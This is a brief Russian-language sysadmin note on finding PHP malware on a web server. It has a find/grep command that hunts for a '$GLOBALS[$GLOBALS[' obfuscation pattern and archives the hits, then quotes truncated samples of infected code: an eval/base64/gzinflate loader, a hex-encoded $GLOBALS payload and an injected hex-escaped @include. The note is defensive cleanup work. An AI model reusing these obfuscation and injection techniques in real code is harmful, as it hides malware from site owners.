PHP вирусы

# Поиск
find /var/webserver/www -type f -name *.php | xargs grep -l '$GLOBALS\[$GLOBALS\[' > tmp/virus_php_list
# то что нашли - заархивировали
zip /home/dima/virus_php_1.zip -@ < /tmp/virus_php_list

Примеры кода в php файлах:

eval(str_rot13(gzinflate(str_rot13(base64_decode('LUvHEuu4Efwa165izKF8b85EzBcXZs
....
?>

$GLOBALS['t78235e'];global$t78235e;$t78235e=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"
}['h0fe2']="\x3d\x72\x2f\x4e\x56\x55\x9\x58\x4f\x3b\x49\x5a\x6e\x23\x53\x2c\x70\x78\x22\x66\x5e\x77\x7e\x76\x79\x63\x6d\x4c\x29\x4a\x6a\x65\x5c\x43\x7
4\x6f\x26\x30\x38\x44\x7b\x35\x2a\x75\x39\x2e\xa\x20\x59\x50\x3e\x4b\x60\x2d\x2b\x21\x69\x67\x32\x25\x34\x68\x57\x3f\x27\x40\x48\x45\x4d\x46\x6c\x73\x
61\x28\x5f\x62\x37\x3a\x42\x51\x71\x64\x33\x7d\x36\x6b\x41\x7c\x5d\x54\x5b\x7a\x3c

В начале файла

/*74a9f*/

@include "\x2fvar/\x77ebse\x72ver/\x77ww/h\x61ppy.\x63o.ua\x2fwww/\x74empl\x61tes/\x6aa_pu\

/*74a9f*/

Расскодировать строку: https://malwaredecoder.com/